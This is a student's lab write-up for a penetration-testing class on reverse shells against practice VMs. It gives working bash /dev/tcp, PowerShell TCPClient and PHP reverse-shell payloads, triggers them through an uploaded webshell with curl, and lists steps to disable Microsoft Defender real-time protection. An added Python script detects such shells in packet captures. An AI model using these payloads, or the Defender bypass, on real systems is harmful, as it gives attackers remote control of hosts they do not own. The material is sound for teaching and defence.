Class Activity 8.2 - Reverse Shells

A reverse shell occurs when we convince the target to connect to the attacker. This vastly simplifies command and control because firewall egress rules are nearly always more permissive than ingress rules. Even so, Windows 10 will present us with a problem. In the spirit of living off the land, we will spend some time using target native tools (as opposed to uploading or installing nc on the target) to create a command and control channel between the target and kali. The "target" is not actually a pen testing target but just a generic Rocky 8.5 Linux server that we can practice on. Some exercises will leverage our previously exploited systems.

Reverse Shell Reference: https://www.invicti.com/learn/reverse-shell/

Bash Reverse Shell on Linux

  • Login to sec335-rocky (10.0.17.200) from kali using ssh and your cyber.local credentials

  • Determine your DHCP address from your kali vm's eth0

    • 10.0.17.44

  • On Kali, create a nc listener on 4449/tcp

nc -nlvp 4449 
  • On Rocky use a native bash reverse shell to connect back to your listener. /dev/tcp/HOST/PORT is a bash-only pseudo-device (no such file exists on disk); >& sends the shell's stdout and stderr to that socket and 0>&1 makes its stdin the same socket, so nothing beyond bash is needed on the target:

/bin/bash -i >& /dev/tcp/10.0.17.44/4449 0>&1
  • You should see a line in your kali terminal saying that 10.0.17.200 has connected to your kali box!

    • You should also see that the prompt is no longer user@kali but the user and hostname of the other host

  • Interact with sec335-rocky over your nc session

    • whoami

    • hostname

Traffic Analysis of bash reverse shell

Deliverable 1. Run wireshark, create a capture filter on 4449/tcp, and capture a command or two entered through the nc session.

  • Capture filter (set before starting the capture): tcp port 4449. The tcp.port == 4449 form is display-filter syntax and only narrows a capture that already exists. Nothing encrypts the nc session, so Follow TCP Stream on the conversation shows the whole dialogue in clear text, prompt included.

  • This packet is the command whoami that I ran

  • This packet is the response to the whoami command (hannelore.sanokklis)
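The capture in Deliverable 1 is also what a defender sees. As an added example that is not part of the class activity, the script below scans TCP payloads (already split per packet and per direction, as Wireshark would show them) for the tells of an unencrypted bash -i reverse shell: the interactive prompt that bash writes to stderr, which the >& redirection turned into the socket, recon commands flowing the other way, and the spawn string itself if it was captured. The sessions at the bottom are constructed to resemble the 10.0.17.200 to 10.0.17.44:4449 capture (generic user alice, prompt in the Rocky/CentOS default format); they are not the real packets.

```python
"""Detection check for an unencrypted bash reverse shell in captured TCP payloads.

Added example, not part of the class activity. The sample sessions are constructed.
"""
import re

# Rocky/CentOS-style bash prompt at the very end of a payload: "[user@host ~]$ " or "# "
PROMPT_RE = re.compile(rb"\[[\w.-]+@[\w.-]+ [^\]\n]*\][$#] ?$")
# Strings that spawn the shell, if the launch command itself crossed the wire
SHELL_SPAWN_RE = re.compile(rb"/bin/(?:ba)?sh -i|/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")
# One-line recon commands typically typed first into a fresh shell
RECON_CMDS = {b"whoami", b"id", b"hostname", b"uname -a", b"pwd"}


def classify_payload(direction, payload):
    """Indicator names matched by one TCP payload.

    direction is "target->kali" (sent by the host that opened the connection)
    or "kali->target" (sent by the listener side).
    """
    hits = []
    if direction == "target->kali" and PROMPT_RE.search(payload):
        hits.append("shell_prompt")
    if direction == "kali->target" and payload.strip() in RECON_CMDS:
        hits.append("recon_command")
    if SHELL_SPAWN_RE.search(payload):
        hits.append("shell_spawn")
    return hits


def score_session(payloads):
    """Summarise one TCP session given as an ordered list of (direction, payload)."""
    counts = {"shell_prompt": 0, "recon_command": 0, "shell_spawn": 0}
    commands = []
    for direction, payload in payloads:
        for hit in classify_payload(direction, payload):
            counts[hit] += 1
            if hit == "recon_command":
                commands.append(payload.strip().decode())
    # A prompt coming from the connection initiator plus recon commands going the
    # other way is the shape of a reverse shell; so is a captured spawn string.
    likely = counts["shell_spawn"] > 0 or (
        counts["shell_prompt"] > 0 and counts["recon_command"] > 0
    )
    return {"counts": counts, "commands": commands, "likely_reverse_shell": likely}


# Constructed payloads in the shape of the Deliverable 1 capture (bash -i without a tty
# first complains about job control, then the prompt, then command/response pairs)
REVERSE_SHELL_SESSION = [
    ("target->kali", b"bash: cannot set terminal process group (1337): Inappropriate ioctl for device\n"
                     b"bash: no job control in this shell\n[alice@sec335-rocky ~]$ "),
    ("kali->target", b"whoami\n"),
    ("target->kali", b"alice\n[alice@sec335-rocky ~]$ "),
    ("kali->target", b"hostname\n"),
    ("target->kali", b"sec335-rocky\n[alice@sec335-rocky ~]$ "),
]

# Constructed benign session on the same port (an HTTP exchange) for contrast
BENIGN_SESSION = [
    ("kali->target", b"GET / HTTP/1.1\r\nHost: 10.0.17.200\r\n\r\n"),
    ("target->kali", b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>[x@y z]$ ok</html>"),
]

if __name__ == "__main__":
    for name, session in (("reverse shell", REVERSE_SHELL_SESSION), ("benign", BENIGN_SESSION)):
        print(name, score_session(session))
```

The prompt regex is anchored to the end of the payload on purpose: a prompt is the last thing the shell writes before it waits for input, which is also why a single bare "$ " inside an HTML body does not trip it.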

Deliverable 2. Try this out on Pippen by leveraging an uploaded webshell or reverse shell on pippen to run a similar command to connect back to a listener. You may need to upload a small shell script to make this happen, particularly if you are using the simple-backdoor.php script. Provide a screenshot similar to the one below that shows you invoking the reverse shell on the target via curl or your web browser and catching the connection on your kali box.

  • Interact with the php script in your web browser to see if it actually returns something before you curl the site. You can see in the image below that the simple-backdoor.php backdoor returns something when you load it in the browser.

  • Below is the working command. The bash one-liner must reach the webshell as a single URL-encoded value of cmd. Typed unquoted, your kali shell applies >& and 0>&1 to curl itself (so any connection nc catches comes from curl on kali, not from a shell on Pippen), the spaces end the URL early, and in zsh the unquoted ? is treated as a glob. -G --data-urlencode does the encoding for you:

curl -G --data-urlencode 'cmd=/bin/bash -i >& /dev/tcp/10.0.17.44/4449 0>&1' http://10.0.5.25/upload/simple-backdoor.php
  • simple-backdoor.php hands the value to system(), i.e. to the web server's /bin/sh. /dev/tcp is a bash feature, so if that shell is not bash (Debian and Ubuntu use dash) wrap the payload, e.g. --data-urlencode "cmd=bash -c '/bin/bash -i >& /dev/tcp/10.0.17.44/4449 0>&1'", or upload a small script containing the one-liner as the deliverable suggests. curl appears to hang for as long as the shell is alive; that is expected, since the PHP request does not complete until the command returns.
Visualization of the connection

Start the netcat listener on port 4449 on kali (the host machine) first. Then curl makes an HTTP request to 10.0.5.25 that invokes the backdoor uploaded to the server via FTP; the command it runs on 10.0.5.25 connects back to the netcat listener on kali.

Successful connection back to the NC listener via the 10.0.5.25 server

Windows Powershell Reverse Shell

Reference: https://book.hacktricks.xyz/shells/shells/windows

The following PowerShell code is run via cmd.exe. It opens a TcpClient to the listener, reads the socket into a 64 KB buffer, runs whatever arrived with Invoke-Expression (iex) with stderr merged into stdout, and writes the output back followed by a 'PS <cwd>> ' prompt, so the nc session looks like a PowerShell prompt. Like the bash version, the session is plain text on the wire.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Change ATTACKERIP and ATTACKERPORT to the eth0 IP on kali and the port you assigned to a nc listener.

  • IP is 10.0.17.44; the port below assumes the same 4449/tcp listener (nc -nlvp 4449) as the earlier exercises

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.44',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Microsoft Defender to the Rescue

Microsoft Defender is an outstanding antivirus platform and it knows we are up to no good: the one-liner is a widely published reverse shell, and Defender inspects PowerShell script content at run time through AMSI, so it is blocked even though nothing is written to disk. In order to progress with the example we will need to turn off AV protection. Figure out how to do this. We will need to consider Microsoft Defender and other host-based protections in our penetration testing efforts.

Turn off AV Protection

  1. Select the Start menu.

  2. Search for Windows Security.

  3. Select Virus & threat protection.

  4. Under Virus & threat protection settings, select Manage settings.

  5. Under Real-time protection, change the setting to Off. This requires local administrator rights, and Windows turns real-time protection back on by itself after a short time, so run the reverse shell promptly.

Deliverable 3. Access your windows VM. Provide a screenshot similar to the one below that shows the unsuccessful execution of powershell via cmd.exe followed by the successful reverse shell after you figure out how to turn off Windows Defender.

The script is turning up errors; the professor is currently working on what is wrong.

Deliverable 4. Hit the internet and see if you can create a Python 2, Python 3, or PHP reverse shell on any of the Linux targets. Show the command running, the full text of the command used, and the result of the id command invoked on the Rocky server through the reverse shell.

Reference: https://www.kali.org/tools/webshells/

  • You can find a default reverse-shell in the following directory:

    • /usr/share/webshells/php/php-reverse-shell.php (from the kali webshells package; it spawns /bin/sh -i on the target, so it only works on Unix hosts)

  • Copy php-reverse-shell.php into your week8 directory

  • I changed my file name to be more unique --> reverse-ur-mom.php

    • sudo nano reverse-ur-mom.php

    • Find the two lines in the file marked CHANGE THIS ($ip and $port) and input the IP address and port you are connecting to

      • 10.0.17.44 and 4449

  • Upload the file with the hardcoded IP address to the FTP server on 10.0.5.25

  • Run netcat

    • nc -nlvp 4449

  • In another terminal window run the following command:

curl http://10.0.5.25/upload/reverse-ur-mom.php

Your netcat window should populate with the connection! Run id through it to produce the output Deliverable 4 asks for.
